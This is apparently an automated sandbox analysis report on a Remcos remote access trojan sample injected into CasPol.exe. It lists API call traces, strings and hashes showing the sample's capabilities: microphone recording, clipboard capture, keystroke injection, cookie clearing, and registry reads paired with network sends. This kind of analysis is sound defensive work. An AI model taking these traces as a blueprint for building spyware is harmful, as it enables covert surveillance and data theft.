                                                                                                • Instruction ID: ce46d41f1d9e01bafc0896c2bb0d2adb680072b6a59d341745b23d3028246374
                                                                                                • Opcode Fuzzy Hash: 22687f451b19c2addafc151cb5d5621a4e148b1d4565a19059d61775dc5e4a25
                                                                                                • Instruction Fuzzy Hash: 24B14975A012199FEB24DF18C884BAEB7B4FF49314F1045AEE849A7351D738AE90CF48
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tcp$udp
                                                                                                • API String ID: 0-3725065008
                                                                                                • Opcode ID: af4d639371690cb8637a3a63659cf8324f890a8ac4b6ebd8bb2dc9423f2fa13d
                                                                                                • Instruction ID: 641150f3fd0ea6af627c79cdc5c75230aa36f57d28899e04d0661f3c05bf373f
                                                                                                • Opcode Fuzzy Hash: af4d639371690cb8637a3a63659cf8324f890a8ac4b6ebd8bb2dc9423f2fa13d
                                                                                                • Instruction Fuzzy Hash: 0D71D1716083528FDB24CF1994846ABB7E0AF84746F14442FF885A7352E77CDE81CB8A
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00466454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                • String ID: .part
                                                                                                • API String ID: 1303771098-3499674018
                                                                                                • Opcode ID: 1fdbc512f911ceddf2b625b8a3f5c965c7ffa686e7fde8663f0bacdb3e3cd200
                                                                                                • Instruction ID: 7eae26b3d9efd85ab9a821acf87acbbc445967fcd6ce231ca79d13f55b5b668b
                                                                                                • Opcode Fuzzy Hash: 1fdbc512f911ceddf2b625b8a3f5c965c7ffa686e7fde8663f0bacdb3e3cd200
                                                                                                • Instruction Fuzzy Hash: C631A4715083019FD210EF21DD459AFB7A8FB84755F40093EF9C6B21A1DF38AA48CB9A
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                • waveInOpen.WINMM(00472AF8,000000FF,00472B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                • waveInPrepareHeader.WINMM(00472AC0,00000020,00000000), ref: 00401A66
                                                                                                • waveInAddBuffer.WINMM(00472AC0,00000020), ref: 00401A75
                                                                                                • waveInStart.WINMM ref: 00401A81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                • String ID: dMG$|MG
                                                                                                • API String ID: 1356121797-1683252805
                                                                                                • Opcode ID: 90184a660b4496401ca2bd395970f68dae25d6e8355fffeefbf0e1e22ce1cb2f
                                                                                                • Instruction ID: 140f40b68b7a2e7574469051551963e155d477b90c1392cdc23a62cf20397fe9
                                                                                                • Opcode Fuzzy Hash: 90184a660b4496401ca2bd395970f68dae25d6e8355fffeefbf0e1e22ce1cb2f
                                                                                                • Instruction Fuzzy Hash: 52215C316002019BC725DF66EE1996A7BA6FB84710B00883EF50DE76B0DBF898C0CB5C
                                                                                                APIs
                                                                                                • AllocConsole.KERNEL32(004750FC), ref: 0041C0C4
                                                                                                • GetConsoleWindow.KERNEL32 ref: 0041C0CA
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041C0DD
                                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041C102
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$Window$AllocOutputShow
                                                                                                • String ID: Remcos v$6.0.0 Pro$CONOUT$
                                                                                                • API String ID: 4067487056-3561919337
                                                                                                • Opcode ID: 51f71f4df576cdb042b408fdcee2c306aad9b55f4cf694b49fe88f2f6d88a06c
                                                                                                • Instruction ID: 9cd6404a4583bb7861016a5e8077681a34a6ce6b29b6da971a73374578d830bb
                                                                                                • Opcode Fuzzy Hash: 51f71f4df576cdb042b408fdcee2c306aad9b55f4cf694b49fe88f2f6d88a06c
                                                                                                • Instruction Fuzzy Hash: 750121B1A80304BADA10F7F19D4BF9976AC6B14B09F500426BA05A70C2EEB8A554462D
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D774,0043D774,?,?,?,00449DB1,00000001,00000001,1AE85006), ref: 00449BBA
                                                                                                • __alloca_probe_16.LIBCMT ref: 00449BF2
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449DB1,00000001,00000001,1AE85006,?,?,?), ref: 00449C40
                                                                                                • __alloca_probe_16.LIBCMT ref: 00449CD7
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449D3A
                                                                                                • __freea.LIBCMT ref: 00449D47
                                                                                                  • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                                                                • __freea.LIBCMT ref: 00449D50
                                                                                                • __freea.LIBCMT ref: 00449D75
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: 45550f184a61a9f8ddf17f24dc0c1f131df532b020593bc4805c091103afbf88
                                                                                                • Instruction ID: b9264d00d576e3e69c3e593975f72d59ef517f4fd458bc34bb1ef2c80a576446
                                                                                                • Opcode Fuzzy Hash: 45550f184a61a9f8ddf17f24dc0c1f131df532b020593bc4805c091103afbf88
                                                                                                • Instruction Fuzzy Hash: 3651F8B2A10206AFFB258F65DC82EBF77A9EB44754F15462EFC05DB240EB38DC409658
                                                                                                APIs
                                                                                                • SendInput.USER32 ref: 00418CFE
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418D26
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D4D
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D6B
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418D8B
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418DB0
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418DD2
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418DF5
                                                                                                  • Part of subcall function 00418CA7: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418CAD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InputSend$Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 1167301434-0
                                                                                                • Opcode ID: 03d106074c487e793b96b2f05eb270ad55284c326fdeb905245ef2a17d2a5417
                                                                                                • Instruction ID: 141eef32e971302722b3407f09031bac5ba220a7556c2b6a6b809b2d6bbc12e7
                                                                                                • Opcode Fuzzy Hash: 03d106074c487e793b96b2f05eb270ad55284c326fdeb905245ef2a17d2a5417
                                                                                                • Instruction Fuzzy Hash: 2D318031258349A9E210DF65DC41FDFBBECAFC9B08F04080FB58457191EAA4858C87AB
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00415BDE
                                                                                                • EmptyClipboard.USER32 ref: 00415BEC
                                                                                                • CloseClipboard.USER32 ref: 00415BF2
                                                                                                • OpenClipboard.USER32 ref: 00415BF9
                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415C09
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415C12
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415C1B
                                                                                                • CloseClipboard.USER32 ref: 00415C21
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID:
                                                                                                • API String ID: 2172192267-0
                                                                                                • Opcode ID: e61fdf912e0cfd0a7f9b0cbbb39501059c6254c011d7f379e3d66cd6c91e1bd3
                                                                                                • Instruction ID: 369576e1793333014f6cd695595c81a654a0099a6e7e621b1e9fba3c04e1709a
                                                                                                • Opcode Fuzzy Hash: e61fdf912e0cfd0a7f9b0cbbb39501059c6254c011d7f379e3d66cd6c91e1bd3
                                                                                                • Instruction Fuzzy Hash: EE0152322003009FC350BF71DC59AAE77A5AF80B42F00443FFD06A61A2EF35C949C659
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16
                                                                                                • String ID: a/p$am/pm$hD
                                                                                                • API String ID: 3509577899-3668228793
                                                                                                • Opcode ID: 44ea5ac924aea223c25ec6af7a156dea15db996b08b3c9c3fe5b3e61d2d79652
                                                                                                • Instruction ID: deb853d5fd6adf3918d69246e21912660bd894b39407ab32d9d7da7685977c7a
                                                                                                • Opcode Fuzzy Hash: 44ea5ac924aea223c25ec6af7a156dea15db996b08b3c9c3fe5b3e61d2d79652
                                                                                                • Instruction Fuzzy Hash: 1CD111719002069AFB289F68C9857BBB7B0FF06708F26415BE9019B355D33D9D81CB6B
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 1d80ecd898b2873860388bfd90a69a91c38572b88f559cfcb1da031a1a01905e
                                                                                                • Instruction ID: 0b2e84c71dbf843dbcc2e99f9f8dbab27ea7d8a4e4ef3fbdb467abc62f582456
                                                                                                • Opcode Fuzzy Hash: 1d80ecd898b2873860388bfd90a69a91c38572b88f559cfcb1da031a1a01905e
                                                                                                • Instruction Fuzzy Hash: E061E271D00244AFEB20DF69C842BAABBF4EB4A320F24407BED45EB251D734AD45DB58
                                                                                                APIs
                                                                                                  • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                                                                • _free.LIBCMT ref: 00444296
                                                                                                • _free.LIBCMT ref: 004442AD
                                                                                                • _free.LIBCMT ref: 004442CC
                                                                                                • _free.LIBCMT ref: 004442E7
                                                                                                • _free.LIBCMT ref: 004442FE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID: Z9D
                                                                                                • API String ID: 3033488037-3781130823
                                                                                                • Opcode ID: 1e396c4f324de9ddb7b01a7129941a49517c4d4e7f7401902ff7e7d19c1db4b4
                                                                                                • Instruction ID: 86c8eacfe83d9672290f1135950403671a27bde0e5aa55c461cabd1b4ee88ac5
                                                                                                • Opcode Fuzzy Hash: 1e396c4f324de9ddb7b01a7129941a49517c4d4e7f7401902ff7e7d19c1db4b4
                                                                                                • Instruction Fuzzy Hash: D551B171A00304AFEB20DF6AC881B6A77F4FF95724B1446AEF809D7650E779DA01CB48
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044AA48,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A315
                                                                                                • __fassign.LIBCMT ref: 0044A390
                                                                                                • __fassign.LIBCMT ref: 0044A3AB
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A3D1
                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,0044AA48,00000000,?,?,?,?,?,?,?,?,?,0044AA48,?), ref: 0044A3F0
                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044AA48,00000000,?,?,?,?,?,?,?,?,?,0044AA48,?), ref: 0044A429
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: 19793b4b6baa09b5fac30a83039e1f9c1b1fc09f5707b87a30c95e6118fc2717
                                                                                                • Instruction ID: 781c03a50f1c813746d4e14bf3c61566c92396d5579059589c4d950ed669b936
                                                                                                • Opcode Fuzzy Hash: 19793b4b6baa09b5fac30a83039e1f9c1b1fc09f5707b87a30c95e6118fc2717
                                                                                                • Instruction Fuzzy Hash: 6551C474E002499FDB10CFA8D845AEEBBF4EF09300F14412BE955E7291E774A951CB6A
                                                                                                APIs
                                                                                                • ExitThread.KERNEL32 ref: 004017F4
                                                                                                  • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                                                                  • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401902
                                                                                                  • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                                                                • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                  • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                                                                  • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                • String ID: XMG$NG$NG
                                                                                                • API String ID: 1596592924-1283814050
                                                                                                • Opcode ID: 3fd40c91fe29e31a7d93a1b5d52587cb70dde5978bf48e45b76d3beebb07945a
                                                                                                • Instruction ID: a5e0bc9ac4bbc073a85812dd1d3adb1d2a3c84d0b98f0a89840e4e641ba94373
                                                                                                • Opcode Fuzzy Hash: 3fd40c91fe29e31a7d93a1b5d52587cb70dde5978bf48e45b76d3beebb07945a
                                                                                                • Instruction Fuzzy Hash: 5341B4712042008BC329FB65DD96AAE7395EB94318F10453FF54AA31F2DF389986CB5E
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412D99
                                                                                                  • Part of subcall function 00412A82: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412AF5
                                                                                                  • Part of subcall function 00412A82: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412B24
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                • RegCloseKey.ADVAPI32(TeFTeF,00466554,00466554,00466900,00466900,00000071), ref: 00412F09
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                • String ID: TeFTeF$NG$TG$TG
                                                                                                • API String ID: 3114080316-826076573
                                                                                                • Opcode ID: c27a224ccc895b7d9e3d9dd81089c8e5516be4b14eee41d5a9fbccc406a3c89b
                                                                                                • Instruction ID: 217e792c851e8857c64f97df11b7492b8bc11e7bd79a931969a0b124146415da
                                                                                                • Opcode Fuzzy Hash: c27a224ccc895b7d9e3d9dd81089c8e5516be4b14eee41d5a9fbccc406a3c89b
                                                                                                • Instruction Fuzzy Hash: ED41A1316042005BD224F725D8A2AEF7395AFD0308F50843FF94A671E2EF7C5D4986AE
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437CBB
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437CC3
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437D51
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437D7C
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437DD1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: e20e4e91601e7da6f84b85b393d4409c90c36ea595a33a74ae9b4edf16c34eae
                                                                                                • Instruction ID: 1103995f59bc857a00dd0af833384e4a9f5f4a2e3f3cb1d3a3c35a3a433dd29e
                                                                                                • Opcode Fuzzy Hash: e20e4e91601e7da6f84b85b393d4409c90c36ea595a33a74ae9b4edf16c34eae
                                                                                                • Instruction Fuzzy Hash: 4E410674A042099BCF20DF29C844AAE7BA5AF4C328F14905AEC55AB392D739DD45CF98
                                                                                                APIs
                                                                                                  • Part of subcall function 004125EB: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 0041260F
                                                                                                  • Part of subcall function 004125EB: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 0041262C
                                                                                                  • Part of subcall function 004125EB: RegCloseKey.KERNEL32(?), ref: 00412637
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
                                                                                                • Opcode ID: ef47ebfd30ef03e85a2a2421afb1dda82fcc5287308f7bd369ee109742c52a19
